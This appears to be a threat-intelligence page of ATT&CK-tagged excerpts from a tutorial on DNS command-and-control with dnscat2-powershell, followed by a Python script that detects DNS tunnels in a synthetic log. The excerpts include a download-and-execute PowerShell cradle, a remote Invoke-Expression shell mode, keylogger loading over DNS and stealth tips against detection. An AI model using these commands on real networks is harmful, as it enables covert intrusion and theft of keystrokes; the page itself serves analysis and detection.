“… PowerShell session by typing the following command: exec psh. You may also pass the -ExecPS switch to Start-Dnscat2 to enable this feature. The client will take input from the server, pass it to Invoke-Expression, and return the output. Variables are preserved throughout the…”
T1071.004 DNS (99%)
“PowerShell DNS Command & Control with dnscat2-powershell. Luke Baggett // Imagine a scenario where a penetration tester is trying to set up command and control on an internal network blocking all outbound traffic, excep…”
T1572 Protocol Tunneling (98%)
“… shown, as well as how you can load other PowerShell scripts via DNS. The example script is Get-Keystrokes, part of PowerSploit. Encryption: by default, all traffic is encrypted. This can be turned off by passing -NoEncryption to Start-Dnscat2, and starting the server with fol…”
T1572 Protocol Tunneling (98%)
“… is when the dnscat2 client is on an internal network with an SSH server. By setting up a tunnel from a port on the server to the SSH server on the internal network, you can achieve an interactive SSH session over DNS. The below video shows how this is done: Avoiding detection by…”
T1059.001 PowerShell (96%)
“… WebClient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1') Once the functions are loaded, run the following command to start the dnscat2-powershell client (the Ruby dnscat2.rb process is the server): Start-Dnscat2 -Domain test -DNSServer 1…”
T1572 Protocol Tunneling (95%)
“… a signature could be written based on queries using the precise maximum length of a query. If you want to be slightly more stealthy, you can shorten your maximum request size with the -MaxPacketSize parameter. Many DNS tunnels will use TXT, CNAME, or MX queries due to the simpli…”
T1071.004 DNS (84%)
“… the best DNS tunnel tools around for infosec-related applications. dnscat2 supports encryption, authentication via pre-shared secrets, multiple simultaneous sessions, tunnels similar to those in SSH, command shells, and the most popular DNS query types (TXT, MX, CNAME, A, AA…”
T1071.004 DNS (84%)
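The two excerpts above give the detection angle: a dnscat2 client emits many unique query names that repeatedly hit one fixed maximum length (shortened, but still fixed, with -MaxPacketSize), and it favours TXT, MX and CNAME records. The script below is an added example written for this page, not code from the dnscat2 or dnscat2-powershell projects. It scores a constructed resolver log (a hypothetical "epoch client qname qtype" layout, with a hypothetical tunnel zone tunnel.example.net and sha256-derived hex labels standing in for dnscat2's hex-encoded packets) on exactly those signals and flags the client/zone pairs that look like a tunnel.

```python
import hashlib
import re
from collections import defaultdict

# Constructed resolver log in a hypothetical "<epoch> <client_ip> <qname> <qtype>"
# layout (not any real resolver's format). Benign traffic first.
BENIGN_LINES = [
    "1700000000 10.0.0.5 www.example.com A",
    "1700000001 10.0.0.5 mail.example.com MX",
    "1700000002 10.0.0.5 cdn.assets.example.org CNAME",
] + [f"{1700000010 + i} 10.0.0.9 www.example.com A" for i in range(12)]

TUNNEL_ZONE = "tunnel.example.net"   # hypothetical dnscat2 domain

def make_tunnel_lines(client, zone, n):
    """Synthesise n tunnel-style queries. dnscat2 hex-encodes each packet into
    subdomain labels; here the 'packet' is just sha256 of a counter (no real
    data), split into four 32-character labels so every name has one length."""
    lines = []
    for i in range(n):
        data = hashlib.sha256(f"pkt-{i}".encode()).hexdigest() * 2   # 128 hex chars
        labels = [data[j * 32:(j + 1) * 32] for j in range(4)]
        qtype = ("TXT", "MX", "CNAME")[i % 3]
        lines.append(f"{1700000100 + i} {client} {'.'.join(labels)}.{zone} {qtype}")
    return lines

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+([A-Z]+)$")
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")
TUNNEL_TYPES = {"TXT", "MX", "CNAME"}

def parse(lines):
    """Yield (epoch, client, qname, qtype); malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m[1]), m[2], m[3].rstrip(".").lower(), m[4]

def zone_of(qname):
    # Assumption: the registered zone is the last two labels. Production code
    # should use the public suffix list instead.
    return ".".join(qname.split(".")[-2:])

def score(records, min_queries=10):
    """Per (client, zone): share of queries at the observed maximum length,
    share using TXT/MX/CNAME, share of labels that are raw hex, and how many
    names are unique. Returns a report dict keyed by (client, zone)."""
    stats = defaultdict(lambda: {"lens": [], "names": set(), "tt": 0, "labels": 0, "hex": 0})
    for _, client, qname, qtype in records:
        s = stats[(client, zone_of(qname))]
        s["lens"].append(len(qname))
        s["names"].add(qname)
        s["tt"] += qtype in TUNNEL_TYPES
        sub = qname.split(".")[:-2]
        s["labels"] += len(sub)
        s["hex"] += sum(1 for lab in sub if HEX_LABEL.match(lab))
    report = {}
    for key, s in stats.items():
        n = len(s["lens"])
        if n < min_queries:
            continue                      # too little traffic to judge
        max_len = max(s["lens"])
        r = {
            "queries": n,
            "unique_share": len(s["names"]) / n,
            "max_len": max_len,
            "at_max_share": s["lens"].count(max_len) / n,
            "tunnel_type_share": s["tt"] / n,
            "hex_label_share": s["hex"] / s["labels"] if s["labels"] else 0.0,
        }
        # A tunnel: nearly every name unique, long names that keep hitting one
        # fixed maximum, and either the record types or hex labels give it away.
        r["suspicious"] = (
            r["unique_share"] > 0.9
            and r["max_len"] >= 100
            and r["at_max_share"] >= 0.8
            and (r["tunnel_type_share"] >= 0.5 or r["hex_label_share"] >= 0.8)
        )
        report[key] = r
    return report

def analyse_sample():
    lines = BENIGN_LINES + make_tunnel_lines("10.0.0.7", TUNNEL_ZONE, 20)
    return score(parse(lines))

if __name__ == "__main__":
    for (client, zone), r in sorted(analyse_sample().items()):
        flag = "TUNNEL?" if r["suspicious"] else "ok"
        print(f"{client:<10} {zone:<14} {flag:<8} max_len={r['max_len']} "
              f"at_max={r['at_max_share']:.2f} types={r['tunnel_type_share']:.2f} "
              f"hex={r['hex_label_share']:.2f}")
```

The fixed-length check is what the excerpt calls a signature on the maximum query length; requiring high name uniqueness on top of it keeps a busy CDN hostname queried thousands of times from tripping the rule, and the threshold of 100 characters is an assumption to tune against your own resolver's baseline.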
“… some real practical advantages. Primarily, providing a shell in environments with even the most extreme outbound traffic filtering. The major downside is the slow speeds involved with forwarding all your traffic through the Internet’s DNS servers. Now with a PowerShell version …”
T1059.001 PowerShell (48%)
“… local connections, but you can read about how to set up an authoritative server here. Setup: Ron Bowes gives a great tutorial on how to install the server in his README for dnscat2. Once the server is ready, you can start it like this: sudo ruby dnscat2.rb --dns "domain=tes…”
Summary
Luke Baggett // Imagine a scenario where a Penetration Tester is trying to set up command and control on an internal network blocking all outbound traffic, except traffic towards a […]